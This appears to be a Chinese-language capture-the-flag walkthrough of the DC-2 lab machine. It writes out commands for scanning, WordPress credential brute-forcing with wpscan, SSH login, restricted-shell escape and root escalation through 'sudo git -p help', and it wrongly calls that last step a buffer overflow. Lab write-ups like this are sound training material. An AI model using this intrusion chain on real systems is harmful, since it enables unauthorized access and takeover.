1.arp-scan -l 扫描局域网所有设备
- 查到DC-2的ip
2.nmap端口扫描
- nmap[扫描类型][设置][设备地址]
-命令: nmap -sV -p- 192.168.224.132 - -sV 系统版本检测
- -p 指定的端口
3.修改host文件,
C:\Windows\System32\drivers\etc
- 在网络上访问网站,要首先通过DNS服务器把网络域名(www.XXXX.com)解析成XXX.XXX.XXX.XXX的IP地址后,我们的计算机才能访问。要是对于每个域名请求我们都要等待域名服务器解析后返回IP信息,这样访问网络的效率就会降低,而Hosts文件就能提高解析效率。根据Windows系统规定,在进行DNS请求以前,Windows系统会先检查自己的Hosts文件中是否有这个地址映射关系,如果有则调用这个IP地址映射,如果没有再向已知的DNS 服务器提出域名解析。也就是说Hosts的请求级别比DNS高。
其作用就是将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从Hosts文件中寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到,则系统会再将网址提交DNS域名解析服务器进行IP地址的解析。
4.提示我们使用cewl(字典生成工具)生成一个通用的字典,并告诉了我们flag的位置
cewl [url] [options]
命令:cewl dc-2/ -w result.txt
-w:指定结果输出文件
5.wpscan工具进行扫描用户
-
1.Wpscan
WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。
-
2.Wordpress
WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用
命令:wpscan --url http://dc-2 --enumerate u
暴力枚举用户名
–enumerate选项来扫描并发现关于目标站点主题、插件和用户名信息
6.dirb–目录扫描
此时还没有拿到网站的后台路径,扫后台。这里用dirb Web内容扫描扫描工具
dirb http(s)://url(ip)可挖掘被测网站的目录信息
命令:dirb http://dc-2
该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站
7.通过已经扫描到的用户名和密码对目标主机进行爆破
命令:wpscan --url dc-2 -U user.txt -P result.txt
用得到的两个用户名和密码登录。在jerry的账号里面拿到第二个flag,第二的flag的意思是如果你无法找到利用WordPress的捷径,还有另外一种方法,希望你能找到另一种方法。
8、根据提示,我们换一个思路,上面nmap的结果还有7744端口ssh服务。
尝试使用之前爆破出来的用户名密码登陆SSH尝试ssh远程登录,最终tom成功登录
ssh jerry@192.168.224.132 -p 7744
发现flag3
9.rbash绕过
rbash(The restricted mode of bash),也就是限制型bash;是平时所谓的 restricted shell的一种,也是最常见的 restricted shell
查看可以使用的命令:
echo $PATH
echo /home/tom/usr/bin/*
方法一:
绕过命令:BASH_CMDS[a]=/bin/sh;a
用/bin/bash进入bash
配置环境变量:
PATH:定义命令行解释器搜索用户执行命令的路径
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
方法二:
vi绕过
vi:set shell=/bin/sh
运行shell:shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
10.Git提权
切换到jerry家目录cd /home/jerry,找到flag4
sudo -l:列出用户能以sudo方式执行的所有命令;
这里用git提权,原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码即可以root权限执行这条命令
sudo git -p help
!/bin/bash